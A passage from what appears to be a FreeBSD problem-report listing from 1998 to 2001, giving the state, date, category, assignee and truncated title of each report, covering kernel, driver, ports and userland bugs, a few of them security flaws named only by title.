dropped o [1998/02/28] kern/5877 bmilekic sb_cc counts control data as well as data a [1998/04/07] kern/6238 cg Sound-driver patch for MAD16 (OPTi 928,92 a [1998/05/06] bin/6536 peter pppd doesn't restore drainwait for tty s [1998/06/02] bin/6830 make(1) exhibits confusing and non-standa s [1998/06/23] bin/7033 Same process notified multiple times o [1998/06/24] i386/7057 mdodd 3Com 3C509 locks up, or has >1000ms rtt u s [1998/07/05] kern/7169 cannot use accton on a append-only file o [1998/07/12] i386/7266 yokota PSM detection failure with Linksys consol s [1998/08/10] kern/7556 sl_compress_init() will fail if called an f [1998/09/11] kern/7902 if_de doesn't properly recognize a "Magic o [1998/09/17] bin/7968 If /usr/libexec/yppwupdate DNE, rpc.yppas o [1998/09/30] gnu/8099 obrien [patch] some bugs in cpio f [1998/10/08] kern/8206 [patch] Unconected UDP socket declined, i o [1998/11/10] bin/8646 peter Implement rlogind -a option f [1998/11/20] kern/8778 gibbs Buslogic BT948 in 2 boxes upgraded from S f [1998/11/25] bin/8865 dwmalone syslogd hangs with serial console o [1998/11/29] conf/8903 dillon /etc/rc can do NFS mounts before the netw o [1998/12/21] kern/9163 adrian [patch] squid does not join a multicast g s [1999/01/07] bin/9379 pppd does not go through all interfaces l s [1999/01/08] kern/9391 if_addmulti doesn't check for retifma == o [1999/01/13] kern/9478 assar support for running a script from kldload s [1999/02/06] kern/9927 gibbs the ahc driver doesn't correctly grok swi o [1999/02/15] kern/10107 dillon interlock situation with exec_map and a p f [1999/02/25] bin/10264 davidn passwd(1) tryis NIS even with `-l' switch o [1999/02/28] bin/10312 ken pciconf -l generates output incompatible s [1999/03/02] bin/10353 ypserv gets segmentation violation o [1999/03/09] bin/10510 Remote cvs botches commits on occassion o [1999/03/16] bin/10633 fenner [patch] tcpslice timezone problem and upd a [1999/03/24] kern/10778 ru "ipforward_rt" is not cleared when routin o [1999/03/30] kern/10870 eivind Kernel panic when writing to write-protec s [1999/04/08] misc/11024 getpwnam(3) uses incorrect #define to lim s [1999/04/28] conf/11376 NFS mount may be happening too soon in /e o [1999/05/03] kern/11462 imp CS network interface driver (for CS89XX b o [1999/05/04] kern/11490 yokota VESA+VM86+Splash == unstable system o [1999/05/05] kern/11507 imp CS89XX (i386/isa/if_cs.c) fails to proper o [1999/05/05] misc/11525 dwmalone [PATCH] Networking patches to increase # p [1999/05/07] gnu/11562 tar verification doesn't work o [1999/05/13] kern/11697 tegge Disk failure hangs system o [1999/05/18] i386/11773 yokota mouse works at setup time. Under X it go o [1999/05/28] kern/11922 deischen missing reentrant interfaces for getpwnam o [1999/07/07] kern/12551 mks ASIC output is shifted following a short o [1999/07/20] bin/12727 billf Game patches from NetBSD o [1999/08/14] kern/13141 se Multiple LUN support in NCR driver is bro o [1999/09/10] bin/13691 fenner tcpslice cannot extract over 2GB part of o [1999/09/13] kern/13740 jlemon wrong IP statistics s [1999/09/16] conf/13775 multi-user boot may hang in NIS environme s [1999/09/17] i386/13787 lnc driver isn't really the lnc driver o [1999/09/26] misc/13978 peter a write to last column bug appears since o [1999/09/27] kern/13997 rwatson RLIMIT_NPROC works unadequately for jails s [1999/10/04] i386/14135 lpt1 nolonger exists after 3.2-RELEASE o [1999/10/12] kern/14285 dillon NFS client appears to lose data o [1999/10/14] i386/14334 imp AHA-1542A not supported by FreeBSD 3.x (" o [1999/10/26] kern/14549 mdodd 3C509 broken in 3.3 o [1999/10/27] kern/14566 yokota Non-kernel programs have little/no contro a [1999/11/04] kern/14712 iedowse root has access to NFS mounted directorie s [1999/11/12] kern/14848 Frame Relay support, corrected a [1999/11/12] misc/14856 billf ftp stalls on FreeBSD 3.3 (CDROM) tested o [1999/11/17] i386/14946 mjacob rmt - remote magtape protocol s [1999/12/14] kern/15478 incorrect utmp/wtmp records update upon c o [1999/12/17] kern/15542 de suddenly stops working o [1999/12/23] misc/15662 markm [PATCH] perl5 Sys::Hostname fails if no P o [1999/12/26] kern/15707 dillon bad trap in mprotect o [2000/01/01] kern/15825 dillon Softupdates gets behind, runs the system s [2000/01/02] i386/15845 Driver for RealTek 8029 f [2000/01/03] bin/15877 tobez Perl 5.00503 interpreter crashes with a s o [2000/01/12] kern/16090 mdodd No buffer space available a [2000/01/22] kern/16299 tmm nfs.ko can be unloaded when nfsd is runni f [2000/01/24] ports/16343 reg bsd.port.mk cannot override make.conf. o [2000/02/08] kern/16587 cg Can't record with newpcm & CS4236 (AW35/P o [2000/02/10] kern/16644 Bad comparsion expression in bpf_filter.c o [2000/02/21] conf/16879 tanimura Sound drivers seem to be using shared irq o [2000/02/23] conf/16948 qa Sysinstall/disklabel: bad partition table o [2000/02/25] misc/16991 jhb booting install disk and USB s [2000/03/01] misc/17108 SecureRPC not supported in mount_nfs comm o [2000/03/10] misc/17310 wpaul NIS host name resolving may loop forever o [2000/03/16] kern/17422 bde 4.0-STABLE: top: nlist failed o [2000/03/20] kern/17504 ken Another Micropolis Synchronize Cache Prob f [2000/03/20] misc/17517 wpaul 100/10baseT card resets under load s [2000/03/21] conf/17540 NIS host lookups cause NFS mounts to wedg f [2000/03/21] kern/17542 greid random static with GUS PnP o [2000/03/24] misc/17584 groudier fatal SCSI error with a Symbios 53c875 co o [2000/03/27] i386/17626 green sshd cores when I scp to it o [2000/03/28] alpha/17637 billf misconfigured syscons bell causes panic o o [2000/03/29] i386/17662 gibbs cam_xpt.c incorrectly disables tagged que o [2000/03/31] i386/17713 gibbs MAKEDEV and /stand/sysinstall goofups wit o [2000/04/04] i386/17800 bde [PATCH] problem with statclock initializa f [2000/04/06] kern/17829 The dc driver is seriously broken f [2000/04/07] bin/17843 ftpd fails to set cwd with mode 700 NFS m f [2000/04/10] kern/17905 dillon 4.0-SNAP keep on crashing every 3 days o [2000/04/11] i386/17926 yokota psm device problems with apm resume o [2000/04/12] kern/17961 n_hibma Fatal Trap 12. Page fault while in kernel o [2000/04/12] kern/17965 silby vr (MII-bus version in 4.0 ONLY) driver l o [2000/04/14] kern/18012 adrian vnode_free_list corruption, "free vnode i o [2000/04/17] misc/18065 mdodd FREEBSD 4.0 crashes on boot Compaq Prolia s [2000/04/23] bin/18181 Getty can fail to observe :de: specificat f [2000/04/23] i386/18185 gibbs Adaptec 3950U2 errors during boot/probe o [2000/04/24] kern/18200 mdodd 3com 3c509b recognized twice during boot f [2000/04/25] kern/18209 green rlimits are never checked in exec() if ex f [2000/04/28] kern/18285 the system froze when use scon -s 50 o [2000/05/02] kern/18345 cg sbc / pcm not fully recognizing AWE64 o [2000/05/02] kern/18348 yokota tags o [2000/07/19] kern/20040 msmith Toshiba 2775 hangs after pcib0 driver is o [2000/07/25] misc/20172 byacc 1.9 fails to generate $default tran o [2000/07/27] kern/20234 green panic(): lockmgr: pid 259, not exclusive o [2000/07/29] conf/20282 qa sysinstall does not recover some /etc fil f [2000/07/31] kern/20335 yokota S3Trio64V+ is detected as CGA by syscons a [2000/08/02] bin/20373 Setting breakpoints in shared objects bro o [2000/08/08] ports/20490 tg Termios timeout parameters, VMIN, VTIME, f [2000/08/09] i386/20507 yokota Mouse freezes in 4.0-release after some u o [2000/08/10] misc/20521 mjacob /etc/rmt several problems o [2000/08/10] kern/20523 bde Support for PCI multiport cards for sio d o [2000/08/13] kern/20572 marcel cannot safely remove COMPAT_43 from the k o [2000/08/14] kern/20609 dillon panic: vm_fault: fault on nofault entry, o [2000/08/15] bin/20633 fdisk doesn't handle LBA correctly f [2000/08/17] kern/20689 groudier Newbusified version of ncr driver does no o [2000/08/18] kern/20708 imp Adaptec 1542 ISA SCSI Controller not dete f [2000/08/22] bin/20779 assar junk pointer error causes kpasswd to fail o [2000/08/26] misc/20861 libc_r does not honor socket timeouts o [2000/08/28] gnu/20912 mp gdb does not recognise old executables. f [2000/08/30] bin/20952 markm ftpd doesn't honor account expiration tim o [2000/08/31] kern/20958 mdodd ep0 lockup with ifconfig showing OACTIVE o [2000/09/07] misc/21089 vi silently corrupt open file on SIGINT w f [2000/09/08] kern/21139 ken IBM DNES drives need 'quirk table' entry. p [2000/09/11] bin/21208 tar does not support 2.5 GB file o [2000/09/11] kern/21209 groudier scsi ncr driver installs instead of scsi a [2000/09/13] bin/21248 kris openssl dumps core with blank passwords o [2000/09/13] bin/21251 NIS problem - ypbind does loop in CLNT_BR o [2000/09/14] gnu/21260 buffer overrun in uux o [2000/09/14] ports/21264 markm tn3270 port receives segmentation fault o [2000/09/14] gnu/21276 libI77 is unable to handle files >2Gbytes o [2000/09/15] bin/21292 ifconfig warn but does duplicate IP addre o [2000/09/15] kern/21304 wpaul dc0 watchdog timeouts on NetGear FA310TX o [2000/09/15] kern/21305 roger bktr driver dosn't send signals in contin s [2000/09/18] misc/21384 greid pcm driver has static in recorded audio o [2000/09/19] misc/21406 freebsd's bootinst or booteasy overwrites o [2000/09/20] gnu/21433 g++ optimiser produces bad code on right o [2000/09/21] kern/21461 imp ISA PnP resource allocator problem o [2000/09/21] kern/21463 emulationLinux compatability mode should not allow f [2000/09/27] bin/21603 green Can't change user passwords on 4.1.1-STAB o [2000/09/28] kern/21642 Compaq Netelligent 10/100 card (TI Thunde o [2000/10/02] docs/21708 jlemon kqueue/kevent man pages isn't specific ab o [2000/10/02] ports/21714 sobomax audio problem with nil o [2000/10/05] kern/21771 murray Fix for sppp and Cronyx drivers update a [2000/10/06] kern/21808 [patches] msdosfs incorrectly handles vno o [2000/10/15] misc/21998 green ident only for outgoing connections o [2000/10/19] kern/22142 securelevel does not affect mount o [2000/10/22] bin/22212 skeyaccess(3) doesn't for primary group o [2000/10/24] misc/22284 Change (SunOS) NIS passwd error o [2000/10/25] bin/22291 getcwd() fails on recently-modified NFS-m o [2000/10/30] kern/22417 gibbs advansys wide scsi driver does not suppor o [2000/10/31] i386/22441 pmap_growkernel() is not effective at ker o [2000/11/05] bin/22614 billf pam_ssh dumps core o [2000/11/05] kern/22624 Interrupt conflict btw. vga and Ethernet o [2000/11/06] gnu/22635 Why don't you use truncate(2) in libI77 o [2000/11/13] kern/22826 emulationMemory limits have no effect in linux com o [2000/11/14] bin/22846 Routed does not reflect preference of Int f [2000/11/15] kern/22862 ncr probe fails with CACHE TEST FAILED: ? o [2000/11/15] kern/22866 Packets send on INET6 sockets compatible o [2000/11/18] kern/22943 emulationProblem with linux emulation o [2000/11/18] i386/22944 isa_dmainit fails on machines with 512MB a [2000/11/18] kern/22947 jon IBM 10/100 EtherJet Cardbus (Xircom X3201 o [2000/11/23] gnu/23058 ncurses: tgoto_internal() ugliness o [2000/11/25] bin/23098 ambrisko If installing on a serial console, enable o [2000/11/26] ports/23125 mbr Successful emulation of StarOffice depend f [2000/11/30] conf/23192 FTP REALLY slow on internal NIC aswel (12 p [2000/11/30] bin/23203 opie doesn't know that ssh connections ar o [2000/12/04] bin/23269 green OpenSSH TIS Authentication support has br o [2000/12/07] bin/23352 [SECURITY] buffer overflow in opieftpd f [2000/12/07] misc/23364 gethostbyaddr takes longer or locks up an o [2000/12/08] kern/23400 rwatson IPsec transport mode precludes filtering o [2000/12/11] bin/23489 tcsh fails to do file completion on non-E o [2000/12/12] kern/23515 get error in messages system log "Dec 11 o [2000/12/13] kern/23535 imp 4.x kernels seem to no longer support Ada o [2000/12/14] misc/23561 emulationLinux compatibility mode does not support o [2000/12/18] ports/23638 kuriyama Add turbine-pool.jar to Cocoon CLASSPATH o [2000/12/22] kern/23771 bridge/firewall doesn't work as in bridge o [2000/12/26] bin/23866 dwmalone patch for pointing out current date o [2001/01/02] kern/24032 markm rndcontrol and pccardd use of interupt ha o [2001/01/03] kern/24059 n_hibma USB support broken in SMP kernel o [2001/01/04] kern/24070 n_hibma uhci USB driver disables port on reatachi o [2001/01/04] kern/24074 mdodd Properties of token-ring protocol must be f [2001/01/05] kern/24085 syncing on shutdown leaves filesystem dir o [2001/01/06] kern/24100 imp Having a 3c589 PCMCIA/PCCARD inserted pre o [2001/01/06] docs/24125 wes connect(2) can yield EWOULDBLOCK/EAGAIN f [2001/01/10] conf/24238 First physical interface always has IPv6 o [2001/01/12] bin/24271 dumpon should check its argument more o [2001/01/16] misc/24391 cannot kill amd after interface disappear o [2001/01/19] bin/24461 pirzyk Being able to increase the YP timeout wit o [2001/01/19] bin/24472 libc_r does not honor SO_SNDTIMEO/SO_RCVT o [2001/01/22] kern/24559 aio_suspend() had Bus error when using -l s [2001/01/23] misc/24590 timezone function not compatible witn Sin o [2001/01/25] kern/24629 ng_socket failes to declare connected dat o [2001/01/25] bin/24632 libc_r delicate deviation from libc in ha o [2001/01/25] misc/24641 pthread_rwlock_rdlock can deadlock o [2001/01/28] bin/24691 map-mbone segfaults at getsockname o [2001/01/29] ports/24711 portmgr ${MAKEFILE} causing trouble with ports o [2001/01/30] i386/24737 Socks5 clients die with leaving zombie pr p [2001/02/06] gnu/24903 Patch to remove 32bit limit from tar f [2001/02/06] i386/24916 SCSI timeout errors with adv0 driver (Adv o [2001/02/09] kern/24982 stack gap usage o [2001/02/10] i386/24997 /boot/loader cannot handle extended dos p o [2001/02/11] ports/25007 max telnetx problem on 4.x o [2001/02/12] kern/25037 top doesn't show CPU states (shows zeroes o [2001/02/12] kern/25038 murray dhcp client could not set hostname on boo o [2001/02/13] kern/25067 adrian able to mount a pathname > 80 char. but u o [2001/02/14] kern/25093 4.2-STABLE does not recognize PCNet-ISA+ a [2001/02/19] kern/25201 imp pccard event and syscons beep duration de o [2001/02/19] kern/25213 peter Bus abstraction interface doesn't allow p o [2001/02/21] kern/25248 bde sys/user.h needs sys/param.h, but doesn't f [2001/02/21] kern/25261 gibbs ahc0 no active SCB errors when booting of o [2001/02/21] ports/25272 rse Using eperl as cgi/nph binary executor ca s [2001/02/23] bin/25337 rwatson dmesg -a should be restricted o [2001/02/28] bin/25461 qa sysinstall's fdisk and disklabel don't wo o [2001/03/03] kern/25511 ioctl(fd, FIONREAD, &c) on a FIFO (not PI o [2001/03/05] bin/25542 /bin/sh: null char in quoted string o [2001/03/07] misc/25585 sed.test 8.16 puts bugged sed into infini o [2001/03/07] bin/25586 green Password expiration doesn't work after up o [2001/03/13] kern/25781 Statclocks cannot be disables on ServerWo o [2001/03/14] misc/25801 imp change IP-address on pccard (3Com) fails o [2001/03/15] bin/25826 nfsd -t -h adr1 -h adr2 doesn't work o [2001/03/16] misc/25851 qa Security hole in anonymous FTP setup scri o [2001/03/17] bin/25886 cgetset(3) doesn't get cleared when switc f [2001/03/18] i386/25889 FDISK lost a partition ! o [2001/03/19] bin/25929 Can't use MAKEDEV in fixit mount o [2001/03/20] kern/25949 msmith camcontrol doesn't find new drives or RAI o [2001/03/22] kern/25986 silby Socket would hang at LAST_ACK forever. o [2001/03/22] misc/26002 n_hibma Poor read/write performance on uhci USB c o [2001/03/22] kern/26013 Linksys (rev 3) USB 100TX NIC causes infi o [2001/03/23] ports/26036 dima acroread4 produces invalid postscript in o [2001/03/25] kern/26078 Jails cannot connect to the main server a o [2001/03/26] bin/26093 markm pam_unix rejects authenticating accounts o [2001/03/27] kern/26142 Unlink fails on NFS mounted filesystem o [2001/03/28] kern/26171 emulationnot work Linux-emulator, but hi is work i o [2001/03/31] i386/26261 silo overflow problem in sio driver o [2001/04/02] bin/26307 libc_r aborts when using the KDE media pl o [2001/04/03] kern/26309 PPPoE client panics in kernel - fxp probl o [2001/04/03] misc/26320 mountd breaks IRIX automounter f [2001/04/04] kern/26356 Large copy of files to the machine causes a [2001/04/05] gnu/26362 "cvs server" doesn't honour the global -- o [2001/04/06] kern/26384 dc driver hangs in dc_rxeof o [2001/04/08] kern/26430 cg -CURRENT panics on cat /dev/dsp or cat /d o [2001/04/09] ports/26464 mbr Citrix client no longer reads files in lo o [2001/04/10] misc/26486 setnetgrent hangs when netgroup contains o [2001/04/12] kern/26506 phk sendto() syscall returns EINVAL in jail e o [2001/04/14] kern/26567 Mouse driver will not properly restart if o [2001/04/14] kern/26568 Mouse driver will die if you move mouse a o [2001/04/19] kern/26704 AHA-2940[UW] gives MPARERR on cold boot ( o [2001/04/23] ports/26797 assar arla-0.34.6 causes kernel panic/page faul o [2001/04/23] bin/26809 /etc not saved on upgrade o [2001/04/25] bin/26842 dd dump with h flag takes a very long time o [2001/04/25] ports/26848 sobomax jre port core dumps a [2001/04/25] bin/26869 sheldonh vi(1) crashes in viewing a file with long o [2001/04/27] misc/26897 qa 4.3R sysinstall fails to create swap part f [2001/04/29] kern/26953 adter the installation is over it's make o [2001/04/30] bin/26996 green sshd fails when / mounted read-only f [2001/05/01] kern/27020 FreeBSD 4.3RC compiled with an SMP kernel o [2001/05/02] ports/27052 portmgr libtool port broken in 4.3 RELEASE o [2001/05/04] bin/27086 green OpenSSH does not set X11 forwarding a [2001/05/08] ports/27202 dougb mail/pine sucks rocks when saving over NF o [2001/05/09] bin/27230 nectar Users after NIS lines in /etc/passwd o [2001/05/09] kern/27237 silby Watchdog Timeouts under EXCESSIVE load o [2001/05/09] kern/27242 SIGHUP propagation failure to processes o o [2001/05/10] i386/27247 Panic on install - "page fault syncing di a [2001/05/10] kern/27262 process won't be terminated after CPUTIME o [2001/05/16] misc/27400 4.3 install hangs because it is looking f o [2001/05/17] ports/27419 ports E-FancyLauncer clones itself over and ove o [2001/05/20] kern/27474 Interactive use of user PPP and ipfilter o [2001/05/21] misc/27498 grog vinum crashed after 'vinum dumpconfig' o [2001/05/21] kern/27522 des linprocfs:/proc/stat does not handle SMP o [2001/05/22] kern/27543 des /proc/cpuinfo does not handle SMP hosts o [2001/05/23] docs/27605 doc Cross-document references () o [2001/05/27] kern/27694 cg Panic in csa(4) f [2001/05/29] i386/27729 qa the ls120 device "afd" does not show up u o [2001/06/01] misc/27810 rpc.statd can loop o [2001/06/04] ports/27875 ports invoked on boot, SIGHUP is delivered and a [2001/06/05] misc/27893 sos can't burn audio cds on LG CD-RW CED-8083 o [2001/06/05] misc/27896 Error in /etc/exports invalidates entire o [2001/06/07] ports/27925 portmgr index is not updated when it html manpage o [2001/06/07] ports/27926 portmgr bsd.port.mk does not handle MLINKS with h o [2001/06/07] ports/27929 jmz make extract on x11/XFree86-4 port fails o [2001/06/09] bin/27988 [PATCH] let pam_ssh.so explicitly start s o [2001/06/09] kern/27995 src/sys/pci if_pcn.c revision 1.21 resp. o [2001/06/12] misc/28095 [PATCH] pax may descend into directories o [2001/06/12] kern/28100 Hang after device probe on EISA machine o [2001/06/12] ports/28102 assar Recent changes to 4.3-STABLE break arla-0 o [2001/06/14] ports/28155 portmgr DESTDIR is used incorrectly in bsd.port.m o [2001/06/15] kern/28173 Problem with Touchpad on Inspiron 5000e o [2001/06/15] misc/28188 Cron is being started to early in /etc/rc o [2001/06/16] kern/28218 A peer of TCP socket cannot detect termin o [2001/06/16] bin/28221 eric dialog(1) segfaults (due to the bug in li o [2001/06/17] bin/28223 su doesn't look at login.conf all the tim o [2001/06/17] bin/28224 ftpd doesn't honor invalid shelll in logi o [2001/06/17] i386/28231 /boot/loader can't load kernel on Xyberna o [2001/06/20] bin/28311 markm ftpd and sshd do not honor expired pw ent o [2001/06/23] ports/28378 jedgar p5-Net-IRC-0.70_1 eats irc text with col o [2001/06/23] bin/28381 Can't turn off telnet autologin o [2001/06/24] ports/28398 ports ja-dvips cannot find tex.pro o [2001/06/25] kern/28417 arplookup uses potentially unprotected st o [2001/06/26] bin/28424 mtree fails to report directory hierarchy o [2001/06/26] kern/28434 cs0's promiscuous mode does not work o [2001/06/27] misc/28442 hot rebuild on Compaq Intergrated Smart A o [2001/06/28] ports/28491 kiri www/w3-4 port: mismatch between pkg-plist f [2001/06/28] kern/28497 dmesg corrupted buffer/output o [2001/06/29] misc/28508 problems with backup to Tandberg SLR40 st o [2001/06/30] i386/28536 writing to corrupted msdosfs causes kerne f [2001/06/30] bin/28552 EUC support of wcstombs(3) is broken for o [2001/07/01] i386/28592 Please support boot from ATA RAID-0 devic o [2001/07/04] kern/28692 cg ICH sound driver hangs kernel o [2001/07/04] kern/28713 luigi NEW IPFW FEATURE [PATCHES]: Dynamic rule o [2001/07/06] kern/28768 The system doesn't get connects on one of o [2001/07/06] bin/28773 [PATCH] Bug in pw, no $ in username o [2001/07/07] bin/28798 mikeh mail(1) with a pager (more) requires fg/C o [2001/07/07] i386/28802 3com Performance Pro modem conflicts with o [2001/07/09] kern/28840 gibbs Possible interrupt masking trouble in sys o [2001/07/09] bin/28852 cracauer behavior of /bin/sh with -e option looks o [2001/07/09] kern/28856 3COM PCI FaxModem with shared IRQ causes o [2001/07/11] ports/28889 lioux qpopper-4.0.3 error: Insufficient room to o [2001/07/12] i386/28928 wpaul dual starfire nic doesn't seem to work (a o [2001/07/13] bin/28935 dwmalone syslogd -u doesn't treat * as "all levels f [2001/07/15] i386/28985 Installing FreeBSD 4.3 on a Dell Optiplex o [2001/07/16] bin/29026 traceroute -s option allows any IP addres o [2001/07/17] bin/29049 green multi-user with star o [2001/09/15] misc/30590 /etc/hosts.equiv and ~/.rhosts interactio o [2001/09/15] kern/30592 roam [PATCH] panic: static sysctl oid too high o [2001/09/17] kern/30630 fenner Failure to check for existence of interfa o [2001/09/18] bin/30654 Added ability for newsyslog to archive lo o [2001/09/21] misc/30708 DHCP and multiple interfaces o [2001/09/21] kern/30712 fatal kernel trap during ufs_rename o [2001/09/21] ports/30728 portmgr pkg_add causes install of multiple versio o [2001/09/23] kern/30755 It is impossible to mount CD-ROM in some o [2001/09/23] ports/30767 jmz silly links break XFree-4 port if /usr/X1 o [2001/09/24] kern/30798 contigfree() doesn't o [2001/09/25] kern/30820 sound PCM sound fails o [2001/09/25] ports/30823 ports New port: KinterbasDB, Python module to a o [2001/09/26] bin/30837 Sysinstall doesn't set the schg flag on t o [2001/09/30] ports/30947 ports mail/mahogany fails to build, conflicts w o [2001/09/30] kern/30948 ls'ing mounted brand new floppy locks up o [2001/09/30] kern/30952 kernel panics with 3C905[BC] cards / xl d o [2001/10/01] kern/30958 QUOTA with 0 bytes in quota.user hangs up o [2001/10/01] bin/30959 newfs -i x dumps core for small values of f [2001/10/01] bin/30966 fenner TCPdump repeating on Radius accounting pa o [2001/10/01] kern/30971 peter NFS client modification time resolution i o [2001/10/02] i386/30991 pcm in PNP-OS mode vs. non-PNP-OS mode po o [2001/10/02] bin/30993 xxgdb cannot open source file o [2001/10/04] bin/31029 cjc syslogd remote logging back down o [2001/10/04] i386/31035 Smart Array & SMP hangs on Proliant 1600 o [2001/10/04] bin/31045 routed dumps core o [2001/10/04] kern/31046 Linux OpenGL programs do not work under t o [2001/10/04] kern/31047 Linux programs do not dump core in linux o [2001/10/06] kern/31084 imp xe driver device probe fails in CIS tuple o [2001/10/06] kern/31085 kernel panic on tftp only pxeboot o [2001/10/07] kern/31102 lge + Pentium III data transmission probl o [2001/10/07] kern/31103 nfs read i/o error when nfs-mounting onto o [2001/10/07] ports/31113 portmgr bsd.ports.subdir.mk: remove NOCLEANDEPEND o [2001/10/08] kern/31147 Kernel panics (double fault) in some "net o [2001/10/09] ports/31184 ports Latex2html problem o [2001/10/10] ports/31191 ports netsaint - plugins sometimes not found o [2001/10/10] kern/31203 Cardbus xl driver broken on -CURRENT o [2001/10/11] ports/31216 znerd New port: devel/plist-builder o [2001/10/12] kern/31238 `hpijs' process hangs unkillably in `devb o [2001/10/14] conf/31280 /etc/rc.network NFS server startup broken o [2001/10/15] bin/31306 qa sysinstall fails to create non-root parti o [2001/10/17] bin/31339 make's .if processing buggy o [2001/10/18] misc/31363 sysinstall "partition editor" silently co o [2001/10/21] kern/31398 cg newpcm does not play back the tail of sou f [2001/10/21] ports/31422 ache Does pkg_delete have to erase /usr/local/ f [2001/10/24] kern/31471 Specific IPFW's FWD rule crashes the kern o [2001/10/24] i386/31481 FreeBSD does Not find disk drives with Co o [2001/10/25] kern/31492 Panic in sysctl_remove_oid. o [2001/10/25] ports/31494 ache mod_perl fixes for apache13 port o [2001/10/26] ports/31511 obrien g++30 produces binaries which SIGBUS when o [2001/10/26] kern/31515 Use of USB Keyboard crashes 4.4 during in o [2001/10/29] kern/31597 pcm_addchan incorrectly adds vchans to PC o [2001/10/29] ports/31605 kde kmail cannot decrpyt/encrypt/verify gnupg o [2001/10/30] conf/31631 "MAC address" can't be acquired properly. o [2001/10/31] kern/31659 n_hibma USB controller driver will die after some o [2001/10/31] bin/31661 pthread_kill signal handler doesn't get s f [2001/10/31] misc/31670 Wide-Ultra 10k SCSI 3 drive is not recogn o [2001/10/31] bin/31678 A bug in handling an error reading a CD-R f [2001/11/01] ports/31688 znerd JDK 1.3.1 Update for Sun's Java Communica f [2001/11/01] ports/31689 znerd JDK 1.3.1 update for FreeBSD/Java Commapi f [2001/11/01] bin/31692 2872-or-less-byte ftp binary transfer fro o [2001/11/01] ports/31699 ports The graphics/gd2 port conflicts with grap o [2001/11/03] kern/31746 failed connect(2) seems to cause problems f [2001/11/05] kern/31768 darrenr Use of fastroute in IPFilter reboots the o [2001/11/05] i386/31771 brian PPP compares CHAP81 response case sensiti o [2001/11/05] kern/31790 problem with NFS and jail() o [2001/11/05] ports/31793 kuriyama snmpd loops on udp.ipv6UdpTable.ipv6UdpEn o [2001/11/06] kern/31804 Clearing PME mode kills network performan o [2001/11/07] ports/31819 jmz ports/ispell install doesn't work o [2001/11/07] bin/31835 murray dhclient doesn't close FD's before spawni o [2001/11/07] bin/31837 qa sysinstall change mountpoint o [2001/11/07] kern/31839 mdodd ex0 panic if NIC not cabled a [2001/11/07] ports/31840 portmgr package naming inadequation (gnome vs gtk o [2001/11/07] i386/31845 Toshiba Satellite 2105CDS won't boot Free o [2001/11/08] bin/31860 read wont timeout on sockets if using thr o [2001/11/08] misc/31864 system header file attempts to redefine a o [2001/11/09] ports/31893 des gnats-3.113.1 conflicts with /usr/bin/sen p [2001/11/12] gnu/31929 GNU Tar shipped with FreeBSD handles rela o [2001/11/12] kern/31940 nge gigabit adapter link reset and slow t o [2001/11/13] i386/31967 reboot/shutdown hangs on Sony VAIO 505 w/ o [2001/11/14] kern/31979 Setup and boot locks Compaq Armada E500 l f [2001/11/17] ports/32063 znerd patch for /usr/ports/java/linux-jdk about o [2001/11/17] bin/32072 setuid w/o immutable flag o [2001/11/18] kern/32098 semctl() does not propagate permissions o [2001/11/19] kern/32118 21143 with dc driver will not select 10ba o [2001/11/19] ports/32121 jmz xf86cfg 4.1.0 writes bad "Chipset" value o [2001/11/20] kern/32124 Cannot set 128 bit wep key on prism2 (wi0 f [2001/11/21] bin/32175 green ssh-keygen -p core dumps o [2001/11/22] misc/32194 Adaptec SCSI RAID 2100 fails by reboot o [2001/11/22] bin/32205 brian PPP login fails in LCP negotiation on opt o [2001/11/23] kern/32226 time of day clock runs fast (approx twice o [2001/11/23] ports/32234 portmgr Perl ports not $LOCALBASE clean o [2001/11/24] kern/32256 System crash/reboot when deleting file on o [2001/11/24] bin/32261 dump creates a dump file much larger than o [2001/11/26] alpha/32289 alpha memory management fault o [2001/11/26] bin/32295 pthread dont dequeue signals o [2001/11/26] misc/32297 sound Scratchy sound, bad hiss with ALS4000 bas f [2001/11/27] kern/32331 system panic in quotaoff o [2001/11/27] kern/32338 Network to disk write performance low und o [2001/11/28] kern/32353 if kern.maxproc > 512 sybase ASE 11.9.2( o [2001/11/28] gnu/32365 obrien gcc optimiser bug with -O -march=i686 o [2001/11/29] bin/32374 vi -r doesn't work, file contained unexpe o [2001/12/06] kern/32556 sound system crashes when unloading sound modul f [2001/12/07] ports/32589 dirk mod_php4 configure script fails o [2001/12/07] bin/32591 assar The memory block doubly freed in Heimdal o [2001/12/08] kern/32600 luigi [PATCH] incorrect handling of parent rule o [2001/12/08] bin/32619 des libfetch does not use RFC 1738's definito o [2001/12/08] misc/32631 imp installing 4.4 "mounting root from ufs:/d o [2001/12/09] ports/32663 kde kdelibs2 port potentially conflicts with o [2001/12/10] kern/32668 peter NFS directory removal problems manifested f [2001/12/10] bin/32686 wosch locate command dumps a core file with bro o [2001/12/11] misc/32699 Tulip ether card EN2242 (if_dc.c) use wro o [2001/12/11] ports/32700 assar inode changes for large o [2001/12/11] kern/32716 system hangs when running vid (usb webcam o [2001/12/11] bin/32717 brian ppp(8) change mss to wrong size o [2001/12/12] bin/32759 [PATCH] make(1) System V include behaviou o [2001/12/12] misc/32760 Please MFC /usr/include/malloc.h to -STAB f [2001/12/12] bin/32791 ru FreeBSD's man(1) utility vulnerable to ol o [2001/12/13] kern/32797 Problem with IPX and netgraph(4) o [2001/12/13] ports/32800 dec gated dies on ppp interface up/down o [2001/12/13] kern/32809 yet another panic while syncing disks aft o [2001/12/14] kern/32827 small SO_RCVTIMEO values are taken to be o [2001/12/14] ports/32832 kde Kmail 1.3.2 / kde 2.2.1 / PGP 6.5.8 - kma o [2001/12/14] ports/32844 kde exiting konq term emulator causes crash o [2001/12/21] kern/33074 joe USB printer support does not detect print o [2001/12/21] ports/33080 ume grkrellmvolume interferes with the abilit o [2001/12/21] ports/33082 ports audio/mxv fails to compile o [2001/12/22] kern/33085 jlemon Samba's NMBD cannot find alias interface o [2001/12/22] ports/33093 jdp cvsup SNAP_16_1e breaks by SIGILL during o [2001/12/24] kern/33138 pnp problem in 4.3, 4.4, 4.5 o [2001/12/24] kern/33143 Kernel panic in uhci_abort_xfer_end o [2001/12/24] bin/33155 green [PATCH] sshd can leave hanging processes o [2001/12/26] kern/33201 net/net_osdep.c:if_name is broken o [2001/12/26] kern/33206 sound Soundcard f [2001/12/26] misc/33213 ume rarpd fails to init IPv6 enabled interfac o [2001/12/27] bin/33235 find terminates with "find: fts_read: Per o [2001/12/30] kern/33344 memory leak in device resource config loa o [2001/12/30] kern/33346 jhb Kernel panic with SMP kernel o [2001/12/30] kern/33353 panic at odd times...idle, under no load, o [2001/12/30] misc/33370 Post configuration issue o [2002/01/01] ports/33440 portmgr Ports can not resume an 